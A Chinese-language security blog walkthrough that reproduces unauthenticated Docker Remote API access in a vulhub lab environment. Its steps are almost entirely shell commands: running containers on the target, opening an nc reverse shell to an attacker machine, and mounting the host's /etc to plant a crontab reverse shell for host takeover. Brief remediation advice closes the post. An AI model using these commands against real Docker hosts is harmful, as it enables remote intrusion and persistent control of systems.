Docker Daemon API未授权

admin 2022年8月1日00:49:25评论39 views字数 1629阅读5分25秒阅读模式

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

影响范围应用

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir dockercd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfilewget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.ymlwget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

Docker Daemon API未授权

之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

Docker Daemon API未授权

编译并启动环境

docker-compose up -d

Docker Daemon API未授权

漏洞利用
漏洞检测
docker -H tcp://192.168.17.140:2375 images

Docker Daemon API未授权


反弹shell

Step 1:在VPS上监听9999端口

nc -lnvp 9999

Docker Daemon API未授权

Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

Docker Daemon API未授权

Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

Docker Daemon API未授权


Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

Docker Daemon API未授权

Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  shnc 192.168.17.128 9999 -e /bin/sh

Docker Daemon API未授权

Step 6:在攻击主机中成功接收到shell

Docker Daemon API未授权

Step 7:退出并删除容器

exitdocker -H tcp://192.168.17.140:2375 rm cbb678549422 -fdocker -H tcp://192.168.17.140:2375 ps

Docker Daemon API未授权

物理主机

我们可以在创建容器时将物理主机的计划任务目录挂载到容器中的可写目录中,之后通过在容器中对计划任务进行编辑间接性实现对物理主机中计划任务的编辑,从而实现获取物理主机权限的目的,下面进行简单演示:

Step 1:检测是否存在漏洞

docker -H tcp://192.168.17.140:2375 images

Docker Daemon API未授权

Step 2:在攻击主机中设置监听

Docker Daemon API未授权

Step 3:将宿主机的系统计划任务目录(/etc/crontab)挂载到容器中的/tmp目录下

docker -H tcp://192.168.17.140:2375 run -id -v /etc/:/tmp/etc alpine:latest

Docker Daemon API未授权


Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

Docker Daemon API未授权

Step 5:远程访问容器并写入计划任务

docker -H tcp://192.168.17.140:2375 exec -it f9e17c91eda2  shcrontab -e*  *  *  *  *  /usr/bin/nc 192.168.17.128 9999 -e /bin/shcrontab -l

Docker Daemon API未授权

Docker Daemon API未授权

Step 6:反弹shell

Docker Daemon API未授权

目标检索

暂不提供

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证


原文始发于微信公众号(七芒星实验室):Docker Daemon API未授权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月1日00:49:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Docker Daemon API未授权http://cn-sec.com/archives/1212241.html

发表评论

匿名网友 填写信息